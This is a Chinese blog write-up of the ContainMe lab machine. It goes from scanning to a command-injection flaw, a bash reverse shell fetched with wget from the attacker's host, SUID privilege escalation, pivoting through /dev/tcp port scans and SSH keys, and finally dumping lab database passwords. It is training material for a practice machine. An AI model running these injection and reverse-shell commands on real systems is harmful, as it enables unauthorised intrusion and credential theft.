【Vulnhub靶机】THM-ContainMe-v4

已于 2023-11-25 12:53:30 修改
阅读量263 收藏 1
点赞数 2
分类专栏: # 靶机系列 文章标签: vulnhub 网络安全 web安全 安全
于 2023-09-16 20:31:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/132923781
版权

文章目录

靶机地址:ContainMe: 1

下载地址:THM-ContainMe-v4.ova (Size: 2.2 GB)
难易程度:

信息收集

主机发现

sudo arp-scan -l

image-20230916193734432

端口扫描

sudo nmap -A -p- 192.168.8。9

image-20230916194135574

目录扫描

sudo dirb http://192.168.8.9

image-20230916194149685

dirsearch -u 192.168.8.9 -i 200

image-20230916194236035

发现三个文件index.php,index.html,info.php

依次访问看一下

index.html

image-20230916194305959

info.php

image-20230916194317899

返回了php探针

index.php

image-20230916194333387

页面结果好像执行了ls -la命令

查看页面源代码:

image-20230916194350512

漏洞利用

模糊测试 fuzz ?

什么是fuzz

什么是模糊测试?

wfuzz使用1

wfuzz使用2

wfuzz自动字典位置/usr/share/wfuzz/wordlist

wfuzz -c -u http://192.168.80.139/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt --hh 329

发现了参数path,手动确认一下:

http://192.168.80.139/index.php?path=/etc/passwd

image-20230916194428312

image-20230916194510571

http://192.168.8.9/index.php?path=/etc

image-20230916194520924

http://192.168.8.9/index.php?path=;id

image-20230916194547965

发现确实存在命令执行漏洞

查看那个目录可以写入文件

http://192.168.8.9/index.php?path=;%20ls%20-l%20%20/

image-20230916194636688

kali上开启http服务

python -m http.server 80

image-20230916194818827

写一个反弹shell

#!/bin/bash
# code.sh
bash -i &> /dev/tcp/192.168.8.8/6868 0>&1;

在地址栏中输入

http://192.168.8.9/index.php?path=;wget -P /tmp 192.168.8.8/code.sh;ls -la /tmp;

image-20230916195149426

写入脚本文件后在kali端开启对6868端口的监听

nc -lvp 6868

image-20230906200735088

然后利用命令执行漏洞使用bash进行执行code.sh文件,命令:bash /tmp/code.sh,成功获得shell权限

image-20230916200023465

容器内提权

查看是否有能以root身份执行的文件

 sudo -l

image-20230906202540057

查看/home

image-20230906201530022

  find / -user root -perm /4000 2>/dev/null

image-20230906202642258

发现mike用户家目录下的1cryptupx和使用find命令查看出来的suid中都有类似的crypt

那就cd /usr/share/man/zh_TW/ 执行该crypt文件,看看效果

image-20230906203112538

image-20230916200207495

拿到交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

拿到root后,并没有拿到真正的权限,而在处在Docker容器里

image-20230916200951062

容器外提权

扫描存活的主机

for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5 >/dev/null && echo "172.16.20.$i" &) ;done

image-20230916201003072

扫描端口

for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open

image-20230916200801683

利用ssh密钥登陆到mike用户上

image-20230916201133433

image-20230916201149939

image-20230916201232267

查看开放的端口

image-20230916201314460

连接Mysql

image-20230916201350085

获取数据

image-20230916201455678

+-------+---------------------+
| login | password            |
+-------+---------------------+
| root  | bjsig4868fgjjeog    |
| mike  | WhatAreYouDoingHere |
+-------+---------------------+

image-20230916201658086

过期的秋刀鱼-
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub系列靶机-THM-ContainMe-v4
来日可期的博客
09-16 1214
详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。发现我们拼接的参数执行了,试着查看etc下的passwd文件。:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。
对vulhub靶机THM-ContainMe-v4的渗透测试过程
weixin_52020240的博客
03-24 4904
靶机信息: kali:192.168.21.129 靶机
靶机渗透练习35-ContainMe
hirak0的博客
04-18 948
靶机描述 靶机地址:https://www.vulnhub.com/entry/containme-1,729/ Description The difficulty is easy. It’s a CTF. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.152 靶机: IP地址:192.168.184.151 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 将下载好的靶机环境,导入 VMware ,设置为 NAT 模式 二、
VulnHub1:Jangow: 1.0.1靶机入侵
g457499940的专栏
08-12 718
网络安全
vulnhub靶机渗透 DeRPnStiNK_1
RestoreJustice的博客
03-18 286
发现weblog目录,进而找到网站后台,网站使用的cms是WordPress。访问该目录会自动跳转到http://derpnstink.local/weblog/ 我这里可以直接访问,如果有需要的话的绑定host。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。先在当前用户文件下找。在/Documents找到,derpissues.pcap,拷贝到前面连接一句话木马的蚁剑可访问的目录,用蚁剑下载下来。
Vulnhub靶机】Deathnote: 1死亡笔记
过期的秋刀鱼
09-16 967
so Easy
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub-Durian靶机详细渗透过程
MRS_jianai的博客
01-01 728
VulnHub-Durian靶机详细渗透过程
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
最新发布
Aluxian_的博客
10-26 796
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
[VulnHub靶机渗透]二:BullDog2
qq_45927819的博客
03-06 1922
文章目录一、实验环境二、实验步骤2.1 扫描端口2.2 目录扫描2.3 站点渗透**login模块:****register模块**(垂直越权漏洞)3.1 命令执行漏洞 一、实验环境 kali: 192.168.137.128 BullDog2: 192.168.56.101 二、实验步骤 2.1 扫描端口 nmap -sS -sV -T4 192.168.56.101 2.2 目录扫描 dirb http://192.168.56.101 2.3 站点渗透 login模块: 在login界面尝试用万
看完这篇 教你玩转渗透测试靶机Vulnhub——Hackable: III
Aluxian_的博客
07-08 741
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。
VulnHub系列】Me-and-My-Girlfriend-靶机
薛定谔嘚喵博客
03-12 729
1.信息收集端口发现80和22通过80,使用x-forwarded-for头,就可以看到web后台扫描80的目录,看到一些空白的php文件,虽然前端是空白,后面如果可以查看php内容,这些就是重点查看对象2.web权限进入后台,添加用户后可以通过user_id越权查看所有的用户信息3.shell权限利用前面得到的信息,对ssh进行尝试登录4.权限维持使用ssh进行连接登录,发现flag5.提权(两种方式)
vulnhub靶机-FIRSTBLOOD: 1
臭nana的博客
09-25 1747
绪论:这个靶机比较简单,因为每一步都有提示,而且基本命令都给出来了 1、找到靶机ip:192.168.74.130 nmap -sn 192.168.74.0/24 2、扫描靶机端口,得到80端口和60022端口(ssh服务) root@kali:~# nmap -A -p- 192.168.74.130 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.130 Host is up (0.000
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1
Aluxian_的博客
06-24 1641
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy。
Vulnhub靶场----8、DC-8
七天
03-03 753
Vulnhub-DC8
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值